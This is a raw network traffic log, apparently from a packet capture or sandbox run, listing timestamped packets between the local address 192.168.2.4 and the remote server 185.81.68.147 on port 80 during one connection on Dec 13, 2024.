Dec 13, 2024 07:47:06.867506981 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.867603064 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.867603064 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.868201017 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.868293047 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.868331909 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.868812084 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.869076014 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.869185925 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.869899988 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.869906902 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.869906902 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.870034933 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.870752096 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.870810032 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.870810032 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.870810032 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.870857000 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.870914936 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.871613026 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.871754885 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.872051954 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.872051954 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.872459888 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.872566938 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.872608900 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.873162031 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.873333931 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.873527050 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.874145985 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.874206066 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.874206066 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.874206066 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.874253988 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.874320030 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.996967077 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.997066975 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.997121096 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.997121096 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.997256994 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.997294903 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.997384071 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.997384071 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.998090029 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.998137951 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.998220921 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.998269081 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.998931885 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.999033928 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.999078035 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.999078035 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.999783039 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:06.999833107 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:06.999897003 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.000041008 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.000581026 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.000708103 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.000751019 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.000839949 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.001421928 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.001472950 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.001550913 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.001597881 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.002247095 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.002374887 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.002418041 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.002521992 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.003108978 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.003169060 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.003235102 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.003329039 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.003947020 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.004005909 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.004066944 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.004148006 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.004786015 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.004837990 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.004899979 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.004980087 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.005637884 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.005743027 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.005788088 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.005788088 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.006544113 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.006644964 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.006799936 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.006799936 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.007352114 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.007503033 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.007539034 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.007600069 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.008167028 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.008223057 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.008269072 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.008269072 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.009048939 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.009135962 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.009166956 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.009257078 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.009905100 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.010041952 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.010190964 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.010190964 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.010754108 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.010818958 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.010885000 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.010970116 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.011595964 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.011713982 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.011758089 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.011758089 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.012407064 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.012552023 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.012598038 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.012598038 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.013279915 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.013434887 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.013436079 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.013725996 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.014115095 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.014226913 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.014262915 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.014487028 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.014947891 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.015070915 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.015091896 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.015165091 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.015796900 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.015885115 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.015933037 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.016047001 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.016676903 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.016733885 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.016763926 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.016871929 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.017497063 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.017548084 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.017657995 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.017724991 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.018326044 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.018383026 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.018445969 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.018547058 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.019246101 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.019296885 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.019390106 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.019612074 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.020097971 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.020153046 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.020200014 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.020200014 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.020872116 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.020932913 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.020996094 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.021064997 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.021748066 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.021811962 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.021869898 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.022006035 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.022588015 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.022635937 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.022763968 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.022845984 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.023452044 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.023500919 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.023562908 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.023638010 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.024281979 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.024331093 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.024414062 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.024501085 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.025125027 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.025181055 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.025326014 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.025703907 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.025985003 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.026053905 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.026119947 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.026213884 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.026809931 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.026859999 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.026922941 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.026990891 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.027648926 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.027693033 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.027756929 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.027833939 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.028506994 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.028598070 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.028687000 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.028739929 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.029361963 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.029459953 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.029498100 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.029567003 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.030236959 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.030343056 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.030390978 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.030390978 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.031060934 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.031138897 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.031184912 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.031184912 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.031893015 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.031949043 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.032382011 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.032485962 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.032753944 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.032861948 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.032927990 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.032927990 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.033631086 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.033730030 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.033777952 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.033777952 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.034440994 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.034543991 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.034586906 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.034586906 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.035284042 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.035346031 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.035407066 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.035491943 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.036134958 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.036243916 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.036273956 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.036350965 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.036968946 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.037096024 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.037175894 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.037175894 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.037817955 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.037914038 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.037955046 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.038003922 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.038824081 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.038892031 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.038896084 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.039072990 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.039546967 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.039638996 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.039676905 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.039676905 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.040399075 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.040592909 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.040602922 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.040667057 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.041223049 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.041472912 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.189155102 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.189244986 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.189244986 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.189347029 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.189357996 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.189425945 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.189428091 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.189491034 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.190268040 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.190326929 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.190414906 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.190414906 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.191087008 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.191174030 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.191374063 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.191488028 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.194504023 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.194575071 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.194677114 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.194713116 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.194747925 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.194781065 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.194802046 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.194802046 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.194802046 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.194818974 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.194845915 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.194856882 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.194890976 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.194905043 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.194905043 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.195014954 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.195760965 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.195837021 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.195909023 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.196014881 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.196621895 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.196821928 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.196831942 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.196997881 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.197777033 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.197879076 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.197957039 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.198131084 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.198298931 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.198334932 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.198388100 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.198388100 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.199048996 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.199244022 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.199255943 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.199327946 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.200020075 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.200054884 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.200139046 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.200139046 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.200723886 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.200792074 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.200917006 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.200980902 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.201626062 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.201670885 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.201678991 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.201839924 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.202531099 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.202567101 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.202611923 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.202611923 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.203265905 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.203335047 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.203429937 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.203486919 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.204138994 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.204200029 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.204307079 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.204376936 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.205049038 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.205140114 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.205213070 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.205271959 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.205782890 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.205842018 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.205933094 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.205996037 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.206830978 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.206865072 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.206908941 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.206908941 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.207501888 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.207688093 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.207720995 CET	80	49738	185.81.68.147	192.168.2.4
